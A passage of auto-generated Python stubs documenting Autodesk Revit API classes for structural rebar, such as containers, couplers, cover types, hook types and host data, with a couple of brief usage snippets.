""" pass def SetHookTypeId(self, end, hookTypeId): """ SetHookTypeId(self: RebarContainerItem, end: int, hookTypeId: ElementId) Set the id of the RebarHookType to be applied to the rebar. end: 0 for the start hook, 1 for the end hook. hookTypeId: The id of a RebarHookType element, or invalidElementId if the rebar should have no hook at the specified end. """ pass def SetLayoutAsFixedNumber(self, numberOfBarPositions, arrayLength, barsOnNormalSide, includeFirstBar, includeLastBar): """ SetLayoutAsFixedNumber(self: RebarContainerItem, numberOfBarPositions: int, arrayLength: float, barsOnNormalSide: bool, includeFirstBar: bool, includeLastBar: bool) Sets the Layout Rule property of rebar set to FixedNumber. numberOfBarPositions: The number of bar positions in rebar set arrayLength: The distribution length of rebar set barsOnNormalSide: Identifies if the bars of the rebar set are on the same side of the rebar plane indicated by the normal includeFirstBar: Identifies if the first bar in rebar set is shown includeLastBar: Identifies if the last bar in rebar set is shown """ pass def SetLayoutAsMaximumSpacing(self, spacing, arrayLength, barsOnNormalSide, includeFirstBar, includeLastBar): """ SetLayoutAsMaximumSpacing(self: RebarContainerItem, spacing: float, arrayLength: float, barsOnNormalSide: bool, includeFirstBar: bool, includeLastBar: bool) Sets the Layout Rule property of rebar set to MaximumSpacing spacing: The maximum spacing between rebar in rebar set arrayLength: The distribution length of rebar set barsOnNormalSide: Identifies if the bars of the rebar set are on the same side of the rebar plane indicated by the normal includeFirstBar: Identifies if the first bar in rebar set is shown includeLastBar: Identifies if the last bar in rebar set is shown """ pass def SetLayoutAsMinimumClearSpacing(self, spacing, arrayLength, barsOnNormalSide, includeFirstBar, includeLastBar): """ SetLayoutAsMinimumClearSpacing(self: RebarContainerItem, spacing: float, arrayLength: float, barsOnNormalSide: bool, includeFirstBar: bool, includeLastBar: bool) Sets the Layout Rule property of rebar set to MinimumClearSpacing spacing: The maximum spacing between rebar in rebar set arrayLength: The distribution length of rebar set barsOnNormalSide: Identifies if the bars of the rebar set are on the same side of the rebar plane indicated by the normal includeFirstBar: Identifies if the first bar in rebar set is shown includeLastBar: Identifies if the last bar in rebar set is shown """ pass def SetLayoutAsNumberWithSpacing(self, numberOfBarPositions, spacing, barsOnNormalSide, includeFirstBar, includeLastBar): """ SetLayoutAsNumberWithSpacing(self: RebarContainerItem, numberOfBarPositions: int, spacing: float, barsOnNormalSide: bool, includeFirstBar: bool, includeLastBar: bool) Sets the Layout Rule property of rebar set to NumberWithSpacing numberOfBarPositions: The number of bar positions in rebar set spacing: The maximum spacing between rebar in rebar set barsOnNormalSide: Identifies if the bars of the rebar set are on the same side of the rebar plane indicated by the normal includeFirstBar: Identifies if the first bar in rebar set is shown includeLastBar: Identifies if the last bar in rebar set is shown """ pass def SetLayoutAsSingle(self): """ SetLayoutAsSingle(self: RebarContainerItem) Sets the Layout Rule property of rebar set to Single. 
""" pass def SetPresentationMode(self, dBView, presentationMode): """ SetPresentationMode(self: RebarContainerItem, dBView: View, presentationMode: RebarPresentationMode) Sets the presentation mode for this rebar set when displayed in the given view. dBView: The view. presentationMode: The presentation mode. """ pass def __enter__(self, *args): #cannot find CLR method """ __enter__(self: IDisposable) -> object """ pass def __exit__(self, *args): #cannot find CLR method """ __exit__(self: IDisposable, exc_type: object, exc_value: object, exc_back: object) """ pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass def __repr__(self, *args): #cannot find CLR method """ __repr__(self: object) -> str """ pass ArrayLength = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Identifies the distribution path length of rebar set. Get: ArrayLength(self: RebarContainerItem) -> float Set: ArrayLength(self: RebarContainerItem) = value """ BarsOnNormalSide = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Identifies if the bars of the rebar set are on the same side of the rebar plane indicated by the normal. Get: BarsOnNormalSide(self: RebarContainerItem) -> bool Set: BarsOnNormalSide(self: RebarContainerItem) = value """ BarTypeId = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The identifier of the rebar bar type. Get: BarTypeId(self: RebarContainerItem) -> ElementId """ BaseFinishingTurns = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """For a spiral, the number of finishing turns at the lower end of the spiral. Get: BaseFinishingTurns(self: RebarContainerItem) -> int Set: BaseFinishingTurns(self: RebarContainerItem) = value """ Height = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """For a spiral, the overall height. Get: Height(self: RebarContainerItem) -> float Set: Height(self: RebarContainerItem) = value """ IncludeFirstBar = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Identifies if the first bar in rebar set is shown. Get: IncludeFirstBar(self: RebarContainerItem) -> bool Set: IncludeFirstBar(self: RebarContainerItem) = value """ IncludeLastBar = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Identifies if the last bar in rebar set is shown. Get: IncludeLastBar(self: RebarContainerItem) -> bool Set: IncludeLastBar(self: RebarContainerItem) = value """ IsValidObject = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Specifies whether the .NET object represents a valid Revit entity. Get: IsValidObject(self: RebarContainerItem) -> bool """ ItemIndex = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The index of this item in its associated RebarContainer. Get: ItemIndex(self: RebarContainerItem) -> int """ LayoutRule = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Identifies the layout rule of rebar set. 
Get: LayoutRule(self: RebarContainerItem) -> RebarLayoutRule """ MaxSpacing = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Identifies the maximum spacing between rebar in rebar set. Get: MaxSpacing(self: RebarContainerItem) -> float Set: MaxSpacing(self: RebarContainerItem) = value """ MultiplanarDepth = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """For a multiplanar rebar, the depth of the instance. Get: MultiplanarDepth(self: RebarContainerItem) -> float Set: MultiplanarDepth(self: RebarContainerItem) = value """ Normal = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """A unit-length vector normal to the plane of the rebar Get: Normal(self: RebarContainerItem) -> XYZ """ NumberOfBarPositions = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The number of potential bars in the set. Get: NumberOfBarPositions(self: RebarContainerItem) -> int Set: NumberOfBarPositions(self: RebarContainerItem) = value """ Pitch = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """For a spiral, the pitch, or vertical distance traveled in one rotation. Get: Pitch(self: RebarContainerItem) -> float Set: Pitch(self: RebarContainerItem) = value """ Quantity = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Identifies the number of bars in rebar set. Get: Quantity(self: RebarContainerItem) -> int """ RebarShapeId = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The RebarShape element that defines the shape of the rebar. Get: RebarShapeId(self: RebarContainerItem) -> ElementId Set: RebarShapeId(self: RebarContainerItem) = value """ TopFinishingTurns = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """For a spiral, the number of finishing turns at the upper end of the spiral. Get: TopFinishingTurns(self: RebarContainerItem) -> int Set: TopFinishingTurns(self: RebarContainerItem) = value """ TotalLength = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The length of an individual bar multiplied by Quantity. Get: TotalLength(self: RebarContainerItem) -> float """ Volume = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The volume of an individual bar multiplied by Quantity. Get: Volume(self: RebarContainerItem) -> float """ class RebarContainerIterator(object, IEnumerator[RebarContainerItem], IDisposable, IEnumerator): """ An iterator to a Rebar Container. """ def Dispose(self): """ Dispose(self: RebarContainerIterator) """ pass def MoveNext(self): """ MoveNext(self: RebarContainerIterator) -> bool Increments the iterator to the next item. Returns: True if there is a next available item in this iterator. False if the iterator has completed all available items. """ pass def next(self, *args): #cannot find CLR method """ next(self: object) -> object """ pass def ReleaseUnmanagedResources(self, *args): #cannot find CLR method """ ReleaseUnmanagedResources(self: RebarContainerIterator, disposing: bool) """ pass def Reset(self): """ Reset(self: RebarContainerIterator) Resets the iterator to the initial state. 
""" pass def __contains__(self, *args): #cannot find CLR method """ __contains__[RebarContainerItem](enumerator: IEnumerator[RebarContainerItem], value: RebarContainerItem) -> bool """ pass def __enter__(self, *args): #cannot find CLR method """ __enter__(self: IDisposable) -> object """ pass def __exit__(self, *args): #cannot find CLR method """ __exit__(self: IDisposable, exc_type: object, exc_value: object, exc_back: object) """ pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass def __iter__(self, *args): #cannot find CLR method """ __iter__(self: IEnumerator) -> object """ pass def __repr__(self, *args): #cannot find CLR method """ __repr__(self: object) -> str """ pass Current = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Gets the item at the current position of the iterator. Get: Current(self: RebarContainerIterator) -> RebarContainerItem """ IsValidObject = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Specifies whether the .NET object represents a valid Revit entity. Get: IsValidObject(self: RebarContainerIterator) -> bool """ class RebarContainerParameterManager(object, IDisposable): """ Provides implementation of RebarContainer parameters overrides. """ def AddOverride(self, paramId, value): """ AddOverride(self: RebarContainerParameterManager, paramId: ElementId, value: int) Adds an override for the given parameter as its value will be displayed for the Rebar Container element. paramId: The id of the parameter value: The override value of the parameter. AddOverride(self: RebarContainerParameterManager, paramId: ElementId, value: float) Adds an override for the given parameter as its value will be displayed for the Rebar Container element. paramId: The id of the parameter value: The override value of the parameter. AddOverride(self: RebarContainerParameterManager, paramId: ElementId, value: ElementId) Adds an override for the given parameter as its value will be displayed for the Rebar Container element. paramId: The id of the parameter value: The override value of the parameter. AddOverride(self: RebarContainerParameterManager, paramId: ElementId, value: str) Adds an override for the given parameter as its value will be displayed for the Rebar Container element. paramId: The id of the parameter value: The override value of the parameter. """ pass def AddSharedParameterAsOverride(self, paramId): """ AddSharedParameterAsOverride(self: RebarContainerParameterManager, paramId: ElementId) Adds a shared parameter as one of the parameter overrides stored by this Rebar Container element. paramId: The id of the shared parameter element """ pass def ClearOverrides(self): """ ClearOverrides(self: RebarContainerParameterManager) Clears any overridden values from all parameters of the associated RebarContainer element. """ pass def Dispose(self): """ Dispose(self: RebarContainerParameterManager) """ pass def IsOverriddenParameterModifiable(self, paramId): """ IsOverriddenParameterModifiable(self: RebarContainerParameterManager, paramId: ElementId) -> bool Checks if overridden parameter is modifiable. paramId: Overridden parameter id Returns: True if the parameter is modifiable, false if the parameter is readonly. 
""" pass def IsParameterOverridden(self, paramId): """ IsParameterOverridden(self: RebarContainerParameterManager, paramId: ElementId) -> bool Checks if the parameter has an override paramId: The id of the parameter element Returns: True if the parameter has an override """ pass def IsRebarContainerParameter(self, paramId): """ IsRebarContainerParameter(self: RebarContainerParameterManager, paramId: ElementId) -> bool Checks if the parameter is a Rebar Container parameter paramId: The id of the parameter element Returns: True if the parameter is a Rebar Container parameter """ pass def ReleaseUnmanagedResources(self, *args): #cannot find CLR method """ ReleaseUnmanagedResources(self: RebarContainerParameterManager, disposing: bool) """ pass def RemoveOverride(self, paramId): """ RemoveOverride(self: RebarContainerParameterManager, paramId: ElementId) Removes an overridden value from the given parameter. paramId: The id of the parameter """ pass def SetOverriddenParameterModifiable(self, paramId): """ SetOverriddenParameterModifiable(self: RebarContainerParameterManager, paramId: ElementId) Sets this overridden parameter to be modifiable. paramId: Overridden parameter id """ pass def SetOverriddenParameterReadonly(self, paramId): """ SetOverriddenParameterReadonly(self: RebarContainerParameterManager, paramId: ElementId) Sets this overridden parameter to be readonly. paramId: Overridden parameter id """ pass def __enter__(self, *args): #cannot find CLR method """ __enter__(self: IDisposable) -> object """ pass def __exit__(self, *args): #cannot find CLR method """ __exit__(self: IDisposable, exc_type: object, exc_value: object, exc_back: object) """ pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass def __repr__(self, *args): #cannot find CLR method """ __repr__(self: object) -> str """ pass IsValidObject = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Specifies whether the .NET object represents a valid Revit entity. Get: IsValidObject(self: RebarContainerParameterManager) -> bool """ class RebarContainerType(ElementType, IDisposable): """ Represents a Rebar Container Type, used in the generation of Rebar Container. """ @staticmethod def CreateDefaultRebarContainerType(aDoc): """ CreateDefaultRebarContainerType(aDoc: Document) -> ElementId Creates a new RebarContainerType object with a default name. aDoc: The document. Returns: The newly created type id. """ pass def Dispose(self): """ Dispose(self: Element, A_0: bool) """ pass def getBoundingBox(self, *args): #cannot find CLR method """ getBoundingBox(self: Element, view: View) -> BoundingBoxXYZ """ pass @staticmethod def GetOrCreateRebarContainerType(aDoc, name): """ GetOrCreateRebarContainerType(aDoc: Document, name: str) -> ElementId Creates or returns a RebarContainerType object with a given name. aDoc: The document. name: Name of the type. Returns: The type id. 
""" pass def ReleaseUnmanagedResources(self, *args): #cannot find CLR method """ ReleaseUnmanagedResources(self: Element, disposing: bool) """ pass def setElementType(self, *args): #cannot find CLR method """ setElementType(self: Element, type: ElementType, incompatibleExceptionMessage: str) """ pass def __enter__(self, *args): #cannot find CLR method """ __enter__(self: IDisposable) -> object """ pass def __exit__(self, *args): #cannot find CLR method """ __exit__(self: IDisposable, exc_type: object, exc_value: object, exc_back: object) """ pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass class RebarCoupler(Element, IDisposable): """ Represents a rebar coupler element in Autodesk Revit. """ def CouplerLinkTwoBars(self): """ CouplerLinkTwoBars(self: RebarCoupler) -> bool returns true if the coupler sits on two rebar and false otherwise """ pass @staticmethod def Create(doc, typeId, pFirstData, pSecondData, error): """ Create(doc: Document, typeId: ElementId, pFirstData: ReinforcementData, pSecondData: ReinforcementData) -> (RebarCoupler, RebarCouplerError) Creates a new instance of a Rebar Coupler element within the project. doc: A document. typeId: type id for coupler pFirstData: information about the first reinforcement to be coupled pSecondData: information about the second reinforcement to be coupled; for the default value, coupler is placed on one reinforcement Returns: The newly created Rebar Coupler instance, or ll if the operation fails. """ pass def Dispose(self): """ Dispose(self: Element, A_0: bool) """ pass def getBoundingBox(self, *args): #cannot find CLR method """ getBoundingBox(self: Element, view: View) -> BoundingBoxXYZ """ pass def GetCoupledReinforcementData(self): """ GetCoupledReinforcementData(self: RebarCoupler) -> IList[ReinforcementData] gets the reinforcement data. If coupler stays on one bar the list will have size = 1. If coupler connects two bars the size will be 2. """ pass def GetCouplerPositionTransform(self, couplerPositionIndex): """ GetCouplerPositionTransform(self: RebarCoupler, couplerPositionIndex: int) -> Transform Return a transform representing the relative position of the coupler at index couplerPositionIndex in the set. couplerPositionIndex: An index between 0 and (CouplerQuantity-1). Returns: The position of a coupler in the set relative (0,0,0). """ pass def GetCouplerQuantity(self): """ GetCouplerQuantity(self: RebarCoupler) -> int Identifies the number of couplers in a set. Returns: Returns the number of couplers in a set. """ pass def GetPointsForPlacement(self): """ GetPointsForPlacement(self: RebarCoupler) -> IList[XYZ] gets the point (or points in case of rebar set) where the coupler is placed """ pass def ReleaseUnmanagedResources(self, *args): #cannot find CLR method """ ReleaseUnmanagedResources(self: Element, disposing: bool) """ pass def setElementType(self, *args): #cannot find CLR method """ setElementType(self: Element, type: ElementType, incompatibleExceptionMessage: str) """ pass def __enter__(self, *args): #cannot find CLR method """ __enter__(self: IDisposable) -> object """ pass def __exit__(self, *args): #cannot find CLR method """ __exit__(self: IDisposable, exc_type: object, exc_value: object, exc_back: object) """ pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) 
initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass CouplerMark = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """gets and sets the coupler mark Get: CouplerMark(self: RebarCoupler) -> str Set: CouplerMark(self: RebarCoupler) = value """ class RebarCouplerError(Enum, IComparable, IFormattable, IConvertible): """ Error states for the Rebar Coupler enum RebarCouplerError, values: BarSegementsAreNotParallel (6), BarSegmentsAreNotOnSameLine (7), BarSegmentSmallerThanEngagement (13), BarsNotTouching (3), CurvesOtherThanLine (12), DifferentLayout (2), InconsistentShape (8), IncorrectEndTreatmentCoupler (5), IncorrectEndTreatmentHook (4), IncorrectInputData (1), InvalidDiameter (9), ValidationSuccessfuly (0), VaryingDistanceBetweenDistributionsBars (14) """ def __eq__(self, *args): #cannot find CLR method """ x.__eq__(y) <==> x==yx.__eq__(y) <==> x==yx.__eq__(y) <==> x==y """ pass def __format__(self, *args): #cannot find CLR method """ __format__(formattable: IFormattable, format: str) -> str """ pass def __ge__(self, *args): #cannot find CLR method pass def __gt__(self, *args): #cannot find CLR method pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass def __le__(self, *args): #cannot find CLR method pass def __lt__(self, *args): #cannot find CLR method pass def __ne__(self, *args): #cannot find CLR method pass def __reduce_ex__(self, *args): #cannot find CLR method pass def __str__(self, *args): #cannot find CLR method pass BarSegementsAreNotParallel = None BarSegmentsAreNotOnSameLine = None BarSegmentSmallerThanEngagement = None BarsNotTouching = None CurvesOtherThanLine = None DifferentLayout = None InconsistentShape = None IncorrectEndTreatmentCoupler = None IncorrectEndTreatmentHook = None IncorrectInputData = None InvalidDiameter = None ValidationSuccessfuly = None value__ = None VaryingDistanceBetweenDistributionsBars = None class RebarCoverType(ElementType, IDisposable): """ A named value for a clear cover distance. """ @staticmethod def Create(doc, name, coverDistance): """ Create(doc: Document, name: str, coverDistance: float) -> RebarCoverType Creates a new CoverType in the document. """ pass def Dispose(self): """ Dispose(self: Element, A_0: bool) """ pass def getBoundingBox(self, *args): #cannot find CLR method """ getBoundingBox(self: Element, view: View) -> BoundingBoxXYZ """ pass def ReleaseUnmanagedResources(self, *args): #cannot find CLR method """ ReleaseUnmanagedResources(self: Element, disposing: bool) """ pass def setElementType(self, *args): #cannot find CLR method """ setElementType(self: Element, type: ElementType, incompatibleExceptionMessage: str) """ pass def __enter__(self, *args): #cannot find CLR method """ __enter__(self: IDisposable) -> object """ pass def __exit__(self, *args): #cannot find CLR method """ __exit__(self: IDisposable, exc_type: object, exc_value: object, exc_back: object) """ pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) 
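# --- Usage sketch (not part of the generated stubs) ----------------------
# Creates a named clear-cover value. The distance is in Revit's internal
# units (decimal feet, so 2 in = 2.0 / 12.0); 'doc' is a placeholder for an
# open Document and an open Transaction is assumed.
cover = RebarCoverType.Create(doc, "Exterior 2 in", 2.0 / 12.0)
print(cover.CoverDistance)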
initializes x; see x.__class__.__doc__ for signature """ pass CoverDistance = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """A distance that can be used as a concrete cover value in a document. Get: CoverDistance(self: RebarCoverType) -> float Set: CoverDistance(self: RebarCoverType) = value """ class RebarDeformationType(Enum, IComparable, IFormattable, IConvertible): """ Bar deformation type enum RebarDeformationType, values: Deformed (0), Plain (1) """ def __eq__(self, *args): #cannot find CLR method """ x.__eq__(y) <==> x==yx.__eq__(y) <==> x==yx.__eq__(y) <==> x==y """ pass def __format__(self, *args): #cannot find CLR method """ __format__(formattable: IFormattable, format: str) -> str """ pass def __ge__(self, *args): #cannot find CLR method pass def __gt__(self, *args): #cannot find CLR method pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass def __le__(self, *args): #cannot find CLR method pass def __lt__(self, *args): #cannot find CLR method pass def __ne__(self, *args): #cannot find CLR method pass def __reduce_ex__(self, *args): #cannot find CLR method pass def __str__(self, *args): #cannot find CLR method pass Deformed = None Plain = None value__ = None class RebarHandleType(Enum, IComparable, IFormattable, IConvertible): """ The various types of handles on a Rebar instance that can be joined to References enum RebarHandleType, values: Edge (3), EndOfBar (2), OutOfPlaneExtent (4), RebarPlane (0), StartOfBar (1) """ def __eq__(self, *args): #cannot find CLR method """ x.__eq__(y) <==> x==yx.__eq__(y) <==> x==yx.__eq__(y) <==> x==y """ pass def __format__(self, *args): #cannot find CLR method """ __format__(formattable: IFormattable, format: str) -> str """ pass def __ge__(self, *args): #cannot find CLR method pass def __gt__(self, *args): #cannot find CLR method pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass def __le__(self, *args): #cannot find CLR method pass def __lt__(self, *args): #cannot find CLR method pass def __ne__(self, *args): #cannot find CLR method pass def __reduce_ex__(self, *args): #cannot find CLR method pass def __str__(self, *args): #cannot find CLR method pass Edge = None EndOfBar = None OutOfPlaneExtent = None RebarPlane = None StartOfBar = None value__ = None class RebarHookOrientation(Enum, IComparable, IFormattable, IConvertible): """ Orientation of a rebar hook relative to the path of the Rebar Shape. enum RebarHookOrientation, values: Left (1), Right (-1) """ def __eq__(self, *args): #cannot find CLR method """ x.__eq__(y) <==> x==yx.__eq__(y) <==> x==yx.__eq__(y) <==> x==y """ pass def __format__(self, *args): #cannot find CLR method """ __format__(formattable: IFormattable, format: str) -> str """ pass def __ge__(self, *args): #cannot find CLR method pass def __gt__(self, *args): #cannot find CLR method pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) 
initializes x; see x.__class__.__doc__ for signature """ pass def __le__(self, *args): #cannot find CLR method pass def __lt__(self, *args): #cannot find CLR method pass def __ne__(self, *args): #cannot find CLR method pass def __reduce_ex__(self, *args): #cannot find CLR method pass def __str__(self, *args): #cannot find CLR method pass Left = None Right = None value__ = None class RebarHookType(ElementType, IDisposable): """ A Rebar Hook type object that is used in the generation of Rebar. """ @staticmethod def Create(doc, angle, multiplier): """ Create(doc: Document, angle: float, multiplier: float) -> RebarHookType Creates a new RebarHookType in a document. angle: Determine the hook angle of new RebarHookType. multiplier: Determine the straight line multiplier of new RebarHookType. """ pass @staticmethod def CreateDefaultRebarHookType(ADoc): """ CreateDefaultRebarHookType(ADoc: Document) -> ElementId Creates a new RebarHookType object with a default name. ADoc: The document. Returns: The newly created type id. """ pass def Dispose(self): """ Dispose(self: Element, A_0: bool) """ pass def getBoundingBox(self, *args): #cannot find CLR method """ getBoundingBox(self: Element, view: View) -> BoundingBoxXYZ """ pass def GetDefaultHookExtension(self, barDiameter): """ GetDefaultHookExtension(self: RebarHookType, barDiameter: float) -> float Computes the default hook length, which is equal to barDiameter * multiplier. """ pass def GetHookExtensionLength(self, barType): """ GetHookExtensionLength(self: RebarHookType, barType: RebarBarType) -> float Computes the hook extension length based on current hook length """ pass def IsOffsetLengthRequired(self): """ IsOffsetLengthRequired(self: RebarHookType) -> bool Check whether hook offset length is required. remarks: If hook angle is no more than 90 degree, hook offset length is not meaningful. returns: True if hook offset length is required, otherwise false. """ pass def ReleaseUnmanagedResources(self, *args): #cannot find CLR method """ ReleaseUnmanagedResources(self: Element, disposing: bool) """ pass def setElementType(self, *args): #cannot find CLR method """ setElementType(self: Element, type: ElementType, incompatibleExceptionMessage: str) """ pass def __enter__(self, *args): #cannot find CLR method """ __enter__(self: IDisposable) -> object """ pass def __exit__(self, *args): #cannot find CLR method """ __exit__(self: IDisposable, exc_type: object, exc_value: object, exc_back: object) """ pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass HookAngle = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The hook angle, measured in radians. Must be greater than 0 and no more than pi. Get: HookAngle(self: RebarHookType) -> float Set: HookAngle(self: RebarHookType) = value """ StraightLineMultiplier = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Multiplier of bar diameter. Used to compute a default hook length. The default hook length can be overridden by the RebarBarType class. Get: StraightLineMultiplier(self: RebarHookType) -> float Set: StraightLineMultiplier(self: RebarHookType) = value """ Style = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The hook may only be applied to shapes of the specified style. 
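# Usage sketch: creating a RebarHookType and querying its default extension.
# Assumes an active Document `doc` (e.g. __revit__.ActiveUIDocument.Document in a
# pyRevit / RevitPythonShell session). HookAngle is in radians; lengths are in
# Revit internal units (feet).
import math
import clr
clr.AddReference('RevitAPI')
from Autodesk.Revit.DB import Transaction
from Autodesk.Revit.DB.Structure import RebarHookType

t = Transaction(doc, 'Create 135-degree hook type')
t.Start()
hook = RebarHookType.Create(doc, 0.75 * math.pi, 6.0)   # 135 deg bend, extension = 6 * bar diameter
t.Commit()

bar_diameter = 0.625 / 12.0                              # a 5/8 in bar expressed in feet
print(hook.GetDefaultHookExtension(bar_diameter))        # barDiameter * StraightLineMultiplier
print(hook.IsOffsetLengthRequired())                     # True only for bends of more than 90 degrees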
Get: Style(self: RebarHookType) -> RebarStyle Set: Style(self: RebarHookType) = value """ class RebarHostCategory(Enum, IComparable, IFormattable, IConvertible): """ Rebar host category enum RebarHostCategory, values: Floor (5), Other (0), Part (1), SlabEdge (8), Stairs (7), StructuralColumn (2), StructuralFoundation (6), StructuralFraming (3), Wall (4) """ def __eq__(self, *args): #cannot find CLR method """ x.__eq__(y) <==> x==y """ pass def __format__(self, *args): #cannot find CLR method """ __format__(formattable: IFormattable, format: str) -> str """ pass def __ge__(self, *args): #cannot find CLR method pass def __gt__(self, *args): #cannot find CLR method pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass def __le__(self, *args): #cannot find CLR method pass def __lt__(self, *args): #cannot find CLR method pass def __ne__(self, *args): #cannot find CLR method pass def __reduce_ex__(self, *args): #cannot find CLR method pass def __str__(self, *args): #cannot find CLR method pass Floor = None Other = None Part = None SlabEdge = None Stairs = None StructuralColumn = None StructuralFoundation = None StructuralFraming = None value__ = None Wall = None class RebarHostData(object, IDisposable): """ Interface to rebar-specific data stored in each valid rebar host element. """ def Dispose(self): """ Dispose(self: RebarHostData) """ pass def GetAreaReinforcementsInHost(self): """ GetAreaReinforcementsInHost(self: RebarHostData) -> IList[AreaReinforcement] Returns all AreaReinforcement elements hosted by the referenced element. """ pass def GetCommonCoverType(self): """ GetCommonCoverType(self: RebarHostData) -> RebarCoverType If all exposed faces of the host have the same associated CoverType, return that CoverType; otherwise, return null. Returns: The common CoverType for all exposed faces, or null if there are multiple CoverTypes. """ pass def GetCoverType(self, face): """ GetCoverType(self: RebarHostData, face: Reference) -> RebarCoverType Gets the CoverType associated with a face of the element. Returns: The cover associated with the face, if it is an exposed face. If the face is concealed, returns null. """ pass def GetExposedFaces(self): """ GetExposedFaces(self: RebarHostData) -> IList[Reference] Returns all the exposed faces, that is, those that have an associated CoverType. """ pass def GetFabricAreasInHost(self): """ GetFabricAreasInHost(self: RebarHostData) -> IList[FabricArea] Returns all FabricArea elements hosted by the referenced element. """ pass def GetFabricSheetsInHost(self): """ GetFabricSheetsInHost(self: RebarHostData) -> IList[FabricSheet] Returns all FabricSheet elements hosted by the referenced element. """ pass def GetPathReinforcementsInHost(self): """ GetPathReinforcementsInHost(self: RebarHostData) -> IList[PathReinforcement] Returns all PathReinforcement elements hosted by the referenced element. """ pass def GetRebarContainersInHost(self): """ GetRebarContainersInHost(self: RebarHostData) -> IList[RebarContainer] Returns all RebarContainer elements hosted by the referenced element. """ pass @staticmethod def GetRebarHostData(host): """ GetRebarHostData(host: Element) -> RebarHostData Gets a RebarHostData object referring to the specified rebar host element. host: An element to host rebar. 
Returns: A RebarHostData object, or null. """ pass def GetRebarsInHost(self): """ GetRebarsInHost(self: RebarHostData) -> IList[Rebar] Returns all Rebar elements hosted by the referenced element. """ pass def IsFaceExposed(self, face): """ IsFaceExposed(self: RebarHostData, face: Reference) -> bool Checks whether the specified face is considered exposed, and therefore has an associated CoverType. Returns: True if face is exposed, false otherwise. """ pass @staticmethod def IsValidHost(element=None): """ IsValidHost(self: RebarHostData) -> bool Reports whether the element is a valid rebar host. Returns: True if the referenced Element can currently host Rebar elements, false otherwise. IsValidHost(element: Element) -> bool Identifies whether a given element can host reinforcement. element: The element to check. Returns: True if the input Element can host reinforcement elements, false otherwise. """ pass def ReleaseUnmanagedResources(self, *args): #cannot find CLR method """ ReleaseUnmanagedResources(self: RebarHostData, disposing: bool) """ pass def SetCommonCoverType(self, coverType): """ SetCommonCoverType(self: RebarHostData, coverType: RebarCoverType) Associate a single CoverType with all exposed faces of the host element. coverType: A CoverType object to be applied to all faces. """ pass def SetCoverType(self, face, coverType): """ SetCoverType(self: RebarHostData, face: Reference, coverType: RebarCoverType) Associates the specified CoverType with the specified face of the element. """ pass def __enter__(self, *args): #cannot find CLR method """ __enter__(self: IDisposable) -> object """ pass def __exit__(self, *args): #cannot find CLR method """ __exit__(self: IDisposable, exc_type: object, exc_value: object, exc_back: object) """ pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass def __repr__(self, *args): #cannot find CLR method """ 